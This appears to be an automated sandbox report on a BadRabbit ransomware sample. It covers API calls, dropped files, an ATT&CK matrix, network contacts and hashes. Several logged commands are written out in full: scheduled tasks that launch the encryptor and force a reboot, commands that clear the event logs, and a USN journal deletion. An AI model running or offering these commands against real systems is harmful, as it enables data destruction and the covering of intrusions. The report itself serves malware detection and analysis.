        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04859016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,2_2_04859016
        Source: C:\Users\user\Desktop\download.exeCode function: 0_2_00C010C0 GetModuleHandleW,GetModuleFileNameW,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,0_2_00C010C0
        Source: C:\Windows\2594.tmpProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\download.exeCode function: 0_2_00C01499 SetUnhandledExceptionFilter,UnhandledExcep,GetCurrentProcess,TerminateProcess,0_2_00C01499
        Source: C:\Windows\2594.tmpCode function: 11_2_00007FF73CFC5540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF73CFC5540
        Source: C:\Windows\2594.tmpCode function: 11_2_00007FF73CFC71F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF73CFC71F0
        Source: C:\Windows\2594.tmpCode function: 11_2_00007FF73CFC57FC SetUnhandledExceptionFilter,11_2_00007FF73CFC57FC
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF5C9F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00DF5C9F
        Source: C:\Windows\dispci.exeCode function: 23_2_00DFA966 SetUnhandledExceptionFilter,23_2_00DFA966
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF7757 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00DF7757

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 173.222.162.32 445Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SetupJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SystemJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SecurityJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl ApplicationJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 3065482610 Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogonJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04856FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,2_2_04856FFE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0485841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle,2_2_0485841D
        Source: C:\Windows\dispci.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04856FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,2_2_04856FFE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04858192 GetLocalTime,GetSystemDirectoryW,PathAppendW,wsprintfW,2_2_04858192
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048557E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree,2_2_048557E5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04851531 GetVersion,2_2_04851531
        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected Mimikatz
        Source: Yara matchFile source: 11.0.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Valid Accounts        		1
        Windows Management Instrumentation        		1
        LSASS Driver        		1
        LSASS Driver        		1
        Obfuscated Files or Information        		11
        Input Capture        		2
        System Time Discovery        		Remote Services11
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        Data Encrypted for Impact
        CredentialsDomainsDefault Accounts22
        Native API        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop Protocol11
        Input Capture        		22
        Encrypted Channel        		Exfiltration Over Bluetooth1
        System Shutdown/Reboot
        Email AddressesDNS ServerDomain Accounts1
        Scheduled Task/Job        		1
        Valid Accounts        		1
        Valid Accounts        		1
        File Deletion        		Security Account Manager126
        System Information Discovery        		SMB/Windows Admin Shares1
        Clipboard Data        		1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts12
        Service Execution        		12
        Windows Service        		11
        Access Token Manipulation        		121
        Masquerading        		NTDS1
        Network Share Discovery        		Distributed Component Object ModelInput Capture2
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchd1
        Scheduled Task/Job        		12
        Windows Service        		1
        Valid Accounts        		LSA Secrets141
        Security Software Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
        Bootkit        		112
        Process Injection        		31
        Virtualization/Sandbox Evasion        		Cached Domain Credentials31
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
        Scheduled Task/Job        		11
        Access Token Manipulation        		DCSync2
        Process Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
        Process Injection        		Proc Filesystem1
        Remote System Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Bootkit        		/etc/passwd and /etc/shadow1
        System Network Configuration Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Rundll32        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd2
        Indicator Removal        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591384 Sample: download.exe Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 70 tse1.mm.bing.net 2->70 72 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->72 74 3 other IPs or domains 2->74 84 Malicious sample detected (through community Yara rule) 2->84 86 Antivirus / Scanner detection for submitted sample 2->86 88 Multi AV Scanner detection for submitted file 2->88 90 9 other signatures 2->90 9 download.exe 2 2->9         started        12 cmd.exe 1 2->12         started        15 svchost.exe 1 1 2->15         started        18 10 other processes 2->18 signatures3 process4 dnsIp5 68 C:\Windows\infpub.dat, data 9->68 dropped 20 rundll32.exe 1 3 9->20         started        25 conhost.exe 9->25         started        108 Drops executables to the windows directory (C:\Windows) and starts them 12->108 27 dispci.exe 17 12->27         started        29 conhost.exe 12->29         started        82 127.0.0.1 unknown unknown 15->82 file6 signatures7 process8 dnsIp9 76 173.222.162.32, 443, 445, 49749 AKAMAI-ASUS United States 20->76 78 192.168.2.0 unknown unknown 20->78 80 192.168.2.1, 80 unknown unknown 20->80 62 C:\Windows\dispci.exe, PE32 20->62 dropped 64 C:\Windows\cscc.dat, PE32+ 20->64 dropped 66 C:\Windows\2594.tmp, data 20->66 dropped 92 System process connects to network (likely due to code injection or exploit) 20->92 94 Contains functionality to enumerate network shares of other devices 20->94 96 Clears the journal log 20->96 106 5 other signatures 20->106 31 cmd.exe 1 20->31         started        34 cmd.exe 1 20->34         started        36 cmd.exe 1 20->36         started        42 3 other processes 20->42 98 Antivirus detection for dropped file 27->98 100 Multi AV Scanner detection for dropped file 27->100 102 Contains functionality to infect the boot sector 27->102 104 Contains functionality to register a low level keyboard hook 27->104 38 cmd.exe 1 27->38         started        40 conhost.exe 27->40         started        file10 signatures11 process12 signatures13 110 Clears the journal log 31->110 112 Uses schtasks.exe or at.exe to add and modify task schedules 31->112 44 conhost.exe 31->44         started        46 schtasks.exe 1 31->46         started        48 conhost.exe 34->48         started        56 5 other processes 34->56 50 conhost.exe 36->50         started        52 schtasks.exe 1 36->52         started        58 2 other processes 38->58 54 conhost.exe 42->54         started        60 4 other processes 42->60 process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        download.exe97%ReversingLabsWin32.Ransomware.BadRabbit
        download.exe89%VirustotalBrowse
        download.exe100%AviraTR/Diskcoder.ezxim

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Windows\dispci.exe100%AviraTR/Diskcoder.12354
        C:\Windows\cscc.dat0%ReversingLabs
        C:\Windows\dispci.exe97%ReversingLabsWin32.Ransomware.BadRabbit

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://192.168.2.1/d0%Avira URL Cloudsafe
        http://192.168.2.1/W0%Avira URL Cloudsafe
        http://192.168.2.1:80/top0%Avira URL Cloudsafe
        http://192.168.2.1/;0%Avira URL Cloudsafe
        http://192.168.2.1/0%Avira URL Cloudsafe
        http://192.168.2.1/E0%Avira URL Cloudsafe
        http://diskcryptor.net/0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        s-part-0017.t-0009.t-msedge.net
        		13.107.246.45
        		truefalse
          		high
          ax-0001.ax-msedge.net
          		150.171.27.10
          		truefalse
            		high
            tse1.mm.bing.net
            		unknown
            		unknownfalse
              		high
              api.msn.com
              		unknown
              		unknownfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://diskcryptor.net/rundll32.exe, 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1717652685.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696516164.0000000002C9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696854067.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000017.00000000.1746771759.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp, dispci.exe.2.dr, cscc.dat.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000020.00000003.1762376215.00000111AFCFF000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drfalse
                  		high
                  https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drfalse
                    		high
                    http://192.168.2.1/;rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.thawte.com/ThawteTimestampingCA.crl0download.exe, cscc.dat.2.drfalse
                      		high
                      https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://192.168.2.1/rundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://192.168.2.1/drundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.thawte.com0download.exe, cscc.dat.2.drfalse
                          		high
                          http://192.168.2.1/Erundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://192.168.2.1:80/toprundll32.exe, 00000002.00000002.1763336798.0000000004955000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000020.00000003.1762376215.00000111AFCA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1762376215.00000111AFCE8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drfalse
                            		high
                            http://192.168.2.1/Wrundll32.exe, 00000002.00000002.1754801710.0000000002CF1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000020.00000003.1762376215.00000111AFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.32.drfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              173.222.162.32
                              		unknownUnited States
                              		35994AKAMAI-ASUStrue

                              Private

                              IP
                              192.168.2.0
                              192.168.2.1
                              127.0.0.1

                              General Information

                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1591384
                              Start date and time:2025-01-14 23:24:57 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 50s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:55
                              Number of new started drivers analysed:3
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Sample name:download.exe
                              Detection:MAL
                              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@58/8@2/4
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 90
                              • Number of non-executed functions: 139
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Connection to analysis system has been lost, crash info: Unknown
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, smss.exe, dwm.exe, csrss.exe, winlogon.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 2.23.242.162, 40.126.32.140, 40.126.32.138, 20.190.160.20, 40.126.32.134, 40.126.32.68, 40.126.32.136, 20.190.160.17, 40.126.32.74, 2.23.240.64, 204.79.197.203, 104.102.63.47, 2.23.227.215, 2.23.227.208, 2.21.65.154, 2.21.65.132, 20.199.58.43, 20.223.35.26, 13.107.246.45
                              • Excluded domains from analysis (whitelisted): otelrules.afd.azureedge.net, www.tm.lg.prod.aadmsa.akadns.net, p-static.bing.trafficmanager.net, iris-de-prod-azsc-v2-frc.francecentral.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, wildcard.weather.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, r.bing.com, arc.trafficmanager.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, www.bing.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, e15275.d.akamaiedge.net, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, r.bing.com.edgekey.net, a-0003.a-msedge.net, tile-service.weather.microsoft.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, mm-mm.bing.net.trafficmanager.net, e1553.dspg.akamaiedge.net, azureedge-t-prod.trafficmanager.net, iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com, api-msn-co
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              17:25:53API Interceptor2x Sleep call for process: rundll32.exe modified
                              17:25:57API Interceptor2x Sleep call for process: svchost.exe modified
                              22:25:54Task SchedulerRun new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 3065482610 &amp;&amp; exit

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              173.222.162.32Mc.exeGet hashmaliciousUnknownBrowse
                                a.exeGet hashmaliciousUnknownBrowse
                                  RgZaLjgCto.exeGet hashmaliciousTinbaBrowse
                                    JRDpxoBkBJ.exeGet hashmaliciousNotPetyaBrowse
                                      smartsscreen.exeGet hashmaliciousXmrigBrowse
                                        java.exeGet hashmaliciousTinbaBrowse
                                          java.exeGet hashmaliciousTinbaBrowse
                                            java.exeGet hashmaliciousTinbaBrowse
                                              p2pWin.exeGet hashmaliciousPetya / NotPetya, MimikatzBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ax-0001.ax-msedge.nethttps://click.e.varietyvibes.buzz/Y3hpZjhhck5JNVlmRWJOUitMVlFVUzdWZlpZQm41V0lZS3E5dlJjWHNLbzhudFR6Qm5uVlZMZ2hqdkVBTmpZZUxFL2tJclNpYnJaTEdFOC9RVU5CZVlkY004d3ZTblF4S0Y5NW82WmdjMFU9Get hashmaliciousUnknownBrowse
                                                • 150.171.28.10
                                                http://www.brillflooring.comGet hashmaliciousUnknownBrowse
                                                • 150.171.28.10
                                                https://iyztciuamr.cfolks.pl/ppGet hashmaliciousUnknownBrowse
                                                • 150.171.28.10
                                                https://metahorizonsfacebooksupport.tempisite.com/italy39Get hashmaliciousHTMLPhisherBrowse
                                                • 150.171.27.10
                                                http://tetsuyiq.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                • 150.171.27.10
                                                https://informed.deliveryqdmox.top/us/Get hashmaliciousHTMLPhisherBrowse
                                                • 150.171.27.10
                                                https://9u2pd0kb4iw1eqefiwbh.shoptee.cc/index/user/login.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 150.171.27.10
                                                https://indexrequestverse.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                • 150.171.28.10
                                                phish_alert_sp2_2.0.0.0 (2).emlGet hashmaliciousUnknownBrowse
                                                • 150.171.28.10
                                                http://ledger-recovery.co.uk/Get hashmaliciousUnknownBrowse
                                                • 150.171.28.10
                                                s-part-0017.t-0009.t-msedge.nethttps://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789Get hashmaliciousUnknownBrowse
                                                • 13.107.246.45
                                                habHh1BC0L.dllGet hashmaliciousWannacryBrowse
                                                • 13.107.246.45
                                                19MgUpI9tj.dllGet hashmaliciousWannacryBrowse
                                                • 13.107.246.45
                                                https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9dGet hashmaliciousUnknownBrowse
                                                • 13.107.246.45
                                                hzQNazOx3Z.dllGet hashmaliciousWannacryBrowse
                                                • 13.107.246.45
                                                eIZi481eP6.dllGet hashmaliciousWannacryBrowse
                                                • 13.107.246.45
                                                Yx3rRuVx3c.dllGet hashmaliciousWannacryBrowse
                                                • 13.107.246.45
                                                sUlHfYQxNw.dllGet hashmaliciousWannacryBrowse
                                                • 13.107.246.45
                                                logitix.pdfGet hashmaliciousHTMLPhisherBrowse
                                                • 13.107.246.45
                                                DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.246.45

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AKAMAI-ASUSmlfk8sYaiy.dllGet hashmaliciousWannacryBrowse
                                                • 172.230.50.2
                                                XML-702.msiGet hashmaliciousAteraAgentBrowse
                                                • 2.23.77.188
                                                EFT_Payment_Notification_Gheenirrigation.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 2.19.126.89
                                                MissedCall_Record_3295935663.htmlGet hashmaliciousUnknownBrowse
                                                • 2.19.126.85
                                                62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                Message.emlGet hashmaliciousHTMLPhisherBrowse
                                                • 184.28.90.27
                                                PropostaOrcamentoPdf.msiGet hashmaliciousAteraAgentBrowse
                                                • 2.17.190.73
                                                meth10.elfGet hashmaliciousMiraiBrowse
                                                • 104.84.5.44
                                                meth1.elfGet hashmaliciousMiraiBrowse
                                                • 104.84.160.200
                                                m68k.elfGet hashmaliciousUnknownBrowse
                                                • 23.203.64.19

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Windows\cscc.datLisectAVT_2403002C_35.exeGet hashmaliciousBabuk, Mimikatz, TrojanRansomBrowse
                                                  09490699.exeGet hashmaliciousUnknownBrowse
                                                    09490699.exeGet hashmaliciousUnknownBrowse
                                                      07bb0738.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                                                        4d44bed6.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                                                          63416c4d.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                                                            irH9zMhZub.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                                                              1jDe7zWnoe.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, Petya, RedLineBrowse
                                                                bpkAAJptGv.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                                                                  4W5dQXszUV.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse

                                                                    Created / dropped Files

                                                                    C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\e6becf42d407880aefc5533eec57eadd_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                    Download File
                                                                    Process:C:\Windows\dispci.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):50
                                                                    Entropy (8bit):1.5212424590621707
                                                                    Encrypted:false
                                                                    SSDEEP:3:/lvlwjn:wjn
                                                                    MD5:4E97ED70D0F9DC5FCF032306DBBD9BDF
                                                                    SHA1:F18AB3400BEF916BB2EAE4B2727906A7EA180C31
                                                                    SHA-256:591B13F80FD9555F9FA53F1AD3B4CA79E742B89006EACDA54D823F6CF37DDD43
                                                                    SHA-512:B4B0C1C4B10F1E9199206E4538ACBF5DA7600023772549C7756C385E9B98B5F0777B4746936D371EECD0A29022E45CE174BA39444F2FC573659D993B711853AE
                                                                    Malicious:false
                                                                    Preview:........................................user-PC$.

                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x331799f1, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.4221603123935326
                                                                    Encrypted:false
                                                                    SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
